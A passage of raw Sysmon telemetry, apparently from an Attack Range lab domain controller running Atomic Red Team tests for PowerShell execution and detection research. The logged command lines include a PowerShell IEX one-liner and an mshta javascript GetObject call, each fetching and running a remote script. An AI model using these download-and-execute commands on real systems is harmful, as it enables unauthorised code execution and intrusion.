f63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc214e6(wow64) 154100x80000000000000001695759Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.215{05ADC7E1-7072-603D-5988-00000000AD01}4844C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001695758Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.207{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-01 22:53:21.483 11241100x80000000000000001695757Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.207{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-01 22:53:21.480 23542300x80000000000000001695756Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.098{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F022A43F17DDFAD4D6DA1FC4CB7CF21E,SHA256=44F3115FDE4DB517ED4EEE5B5C2A127FC749E66E1BF3652464D64575CF9AEE14,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695755Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:29.469{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local55125-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local389ldap 354300x80000000000000001695754Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:29.468{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\System32\dfssvc.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local55125-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local389ldap 23542300x80000000000000001695753Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.051{05ADC7E1-7071-603D-5888-00000000AD01}8860ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695857Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.911{05ADC7E1-7073-603D-5F88-00000000AD01}4224ATTACKRANGE\AdministratorC:\Windows\system32\mshta.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\U8AQOFTC\error[1]MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001695856Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:31.263{00000000-0000-0000-0000-000000000000}8860raw.githubusercontent.com0::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.109.133;<unknown process> 10341000x80000000000000001695855Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.598{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001695854Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.551{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=44D242935BCB52043C22FAC46FF09797,SHA256=EE1545590C22D257F6C2D207A3BA31AF1BE7210E5B928ADB02D64D967AB06B8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695853Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.551{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7515A64CA4BB0C040E52A324CF6E754C,SHA256=9A7486F1DA795BFC07C0E3C34E7168795699E1AD784432EE9EA226028A50F611,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695852Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.551{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F75AB3D955AABFEBA54640A594512238,SHA256=C3DF2007C041583857A22C43AA7AE08674B786221188E1CD91B47976B862F321,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695851Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.520{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695850Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.520{05ADC7E1-29F2-6039-CE05-00000000AD01}24643672C:\Windows\system32\taskhostw.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695849Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.520{05ADC7E1-29F2-6039-CE05-00000000AD01}24643672C:\Windows\system32\taskhostw.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695848Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.489{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695847Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.489{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695846Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.473{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695845Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.473{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695844Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.463{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695843Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.463{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695842Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.463{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695841Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.463{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695840Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.463{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695839Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.462{05ADC7E1-7073-603D-5E88-00000000AD01}27127284C:\Windows\system32\cmd.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695838Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.462{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEmshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close() C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{05ADC7E1-7073-603D-5E88-00000000AD01}2712C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()" 10341000x80000000000000001695837Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.458{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-7073-603D-5E88-00000000AD01}2712C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695836Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.442{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695835Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.442{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695834Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.442{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695833Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.442{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695832Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.442{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-7073-603D-5E88-00000000AD01}2712C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695831Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.442{05ADC7E1-7073-603D-5D88-00000000AD01}32687904C:\Windows\system32\cmd.exe{05ADC7E1-7073-603D-5E88-00000000AD01}2712C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695830Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.454{05ADC7E1-7073-603D-5E88-00000000AD01}2712C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{05ADC7E1-7073-603D-5D88-00000000AD01}3268C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\cmd.exe /c "mshta.exe 